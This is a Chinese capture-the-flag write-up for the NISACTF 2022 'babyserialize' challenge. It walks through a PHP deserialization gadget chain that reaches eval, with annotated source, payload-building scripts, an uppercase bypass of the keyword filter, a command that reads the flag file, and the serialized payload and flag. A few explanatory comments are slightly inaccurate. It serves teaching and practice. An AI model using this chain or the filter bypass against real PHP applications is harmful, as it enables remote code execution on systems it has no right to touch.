[NISACTF 2022]babyserialize        题目做法及思路解析（个人分享）

题目平台地址：NSSCTF | 在线CTF平台

---

一、题目代码

查看分析代码，寻找漏洞点（题目中注释为个人思路标注，实际代码中没有）

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;                           //2.给$txw4ever赋值需要执行的系统命令
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()                  //3.触发invoke（触发条件：把对象当成函数）
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);                 //1.目标：触发eval执行系统代码
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()                  //11.触发wakeup（触发条件：反序列化之前会触发）
    {
        $this->ext->nisa($this->x);             //10.给$ext赋值为对象，即$ext成为对象Ilovetxw，调用不存在的nisa方法和参数，触发Ilovetxw中的call
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){         //9.触发call（触发条件：调用不存在的方法的名称和参数）
        $this->huang->fun=$arg[0];              //8.给$huang赋值为对象，即$huang成为对象four，给不存在的fun属性赋值，触发four中的set
    }

    public function __toString(){               //5.触发toString（触发条件：把对象当做字符串）
        $bb = $this->su;                        //4.给$su赋值为对象，即$bb成为对象NISA，却被当成函数调用，触发Modifier中的invoke
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)        //7.触发set（触发条件：给不存在的成员属性赋值）
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){            //注意需要让fun = "sixsixsix"才能直接后续代码
            strtolower($this->a);               //6.给$a赋值为对象，即把对象Ilovetxw当做字符串进行大小写转换，触发Ilovetxw中的toString
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

二、题目解析

1.解题思路

第一步：给$fun赋值要执行的代码，触发invoke

第二步：触发toString，给$su赋值为对象NISA

第三步：触发set，给$a赋值为对象Ilovetxw

第四步：触发call，给$huang赋值为对象four

第五步：触发wakeup，给$ext赋值为对象Ilovetxw

2.解题代码编写思路

1.查看题目注释代码（一般题目中注释代码存在提示信息），模糊掉了一部分，但是根据题目代码联想能够大概猜测，checkcheck()做了代码过滤，而hint()会终止程序

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}

2.直接将题目代码复制到本地，删除掉注释信息、方法、和属性的赋值（因为在我们编写解题代码时大部分时候用不到方法，而属性的赋值是由我们定义的，后面我们会重新赋值，所以把不重要的信息先删除掉）。

观察题目中执行反序列化的代码，会判断我们通过GET传参传递的ser参数，否则输出题目代码，将该段代码删除，替换为输出序列化的代码（注意当题目中存在private和protected修饰符时需要使用urlencode()函数进行URL编码加密，或后续手动更改输出结果）

<?php
class NISA{
    public $fun;
    public $txw4ever;
}
class TianXiWei{
    public $ext;
    public $x;
}
class Ilovetxw{
    public $huang;
    public $su;
}
class four{
    public $a;
    private $fun;
}
echo urlencode(serialize());
?>

3.首先，将四个对象先实例化，分别为$a、$b、$c、$d，此时我们再根据先前对题目的分析对代码进行编写（具体分析查看 题目代码 中进行注释的解析以及 解题思路 中的分析），得到解题代码。

strtolower()函数是一种常见的字符串处理函数，用于将字符串中的所有字符转换为小写形式。它的主要作用是实现字符串的大小写转换，将大写字母转换为相应的小写字母。

<?php
class NISA{
    public $fun;
    public $txw4ever = "phpinfo();";         //给$fun赋值要执行的代码，我们先使用phpinfo()进行测试
}
class TianXiWei{
    public $ext;
    public $x;
}
class Ilovetxw{
    public $huang;
    public $su;
}
class four{
    public $a;
    private $fun = "sixsixsix";             //需要让fun="sixsixsix"才能执行大小写转换的代码
}
$a = new NISA();
$b = new TianXiWei();
$c = new Ilovetxw();
$d = new four();
$c -> su = $a;                              //给$su赋值为对象NISA，触发invoke
$d ->a = $c;                                //给$a赋值为对象Ilovetxw，触发toString
$c ->huang = $d;                            //给$huang赋值为对象four，触发set
$b ->ext = $c;                              //给$ext赋值为对象Ilovetxw，触发call
echo urlencode(serialize($b));              //执行反序列化,触发wakeup
?>

4.将序列化代码通过ser参数传入后产生报错，根据之前对题目代码进行的分析，猜测对参数进行了过滤，尝试使用大写绕过，最终成功回显

三、解题代码

通过system()函数执行系统命令对flag文件进行读取，得到flag（注意使用大写绕过）。

<?php
class NISA{
    public $fun;
    public $txw4ever = "SYSTEM('cat /fllllllaaag');";         //给$fun赋值要执行的代码，执行查看flag文件命令
}
class TianXiWei{
    public $ext;
    public $x;
}
class Ilovetxw{
    public $huang;
    public $su;
}
class four{
    public $a;
    private $fun = "sixsixsix";             //需要让fun="sixsixsix"才能执行大小写转换的代码
}
$a = new NISA();
$b = new TianXiWei();
$c = new Ilovetxw();
$d = new four();
$c -> su = $a;                              //给$su赋值为对象NISA，触发invoke
$d ->a = $c;                                //给$a赋值为对象Ilovetxw，触发toString
$c ->huang = $d;                            //给$huang赋值为对象four，触发set
$b ->ext = $c;                              //给$ext赋值为对象Ilovetxw，触发call
echo urlencode(serialize($b));              //执行反序列化,触发wakeup
?>

输出结果：

O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3BN%3Bs%3A8%3A%22txw4ever%22%3Bs%3A27%3A%22SYSTEM%28%27cat+%2Ffllllllaaag%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3BN%3B%7D

FLAG：

NSSCTF{a155432b-5656-4b9b-9a6e-9fd7160219c1}